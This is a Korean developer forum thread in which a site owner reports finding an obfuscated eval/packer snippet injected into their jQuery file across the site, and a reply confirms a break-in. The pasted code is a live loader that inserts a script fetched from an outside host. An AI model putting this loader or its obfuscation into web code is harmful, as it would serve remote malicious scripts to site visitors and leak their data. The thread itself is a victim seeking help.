개발 Q&A

제목 홈페이지가 해킹 당한거 같아서 질문드립니다.
글쓴이 블랙환 작성시각 2015/07/17 11:24:17
댓글 : 1 추천 : 0 스크랩 : 0 조회수 : 12177   RSS
CDN 에서 다운 받은 jquery-1.11.3.min.js 파일과
홈페이지에 있는 제이쿼리 파일 코드를 비교해보니 추가된 소스가 있었습니다.
아래 코드인데요... 지금 홈페이지 전체 해당 소스가 들어가 있는 파일을 검색하고있는데
엄청 나오네요. 혹시 이런경험 있으신분 있으세요?


eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))



 다음글 db설정관련 문의드립니다. (1)
 이전글 하이브리드 앱 개발하려고 하는데 참고 서적 추천해주세요... (1)

댓글

kaido / 2015/07/24 14:33:59 / 추천 0
네 해킹 당하신것 맞습니다.
해킹보다는 크랙킹이 맞는거 같긴 하다만..
아무튼 보안누수 부분을 공격 당한것 입니다.

흔한 수법으로는 에디터나 파일등에 묻혀서 스크립트를 jquery에 묻히는 것입니다.

현상으로는 이상하게 페이지가 느려지거나, 접속이 안되거나, 이상한 페이지를 요청하거나 등등입니다.
공격을 하면서 정보를 빼간다고 하더군요.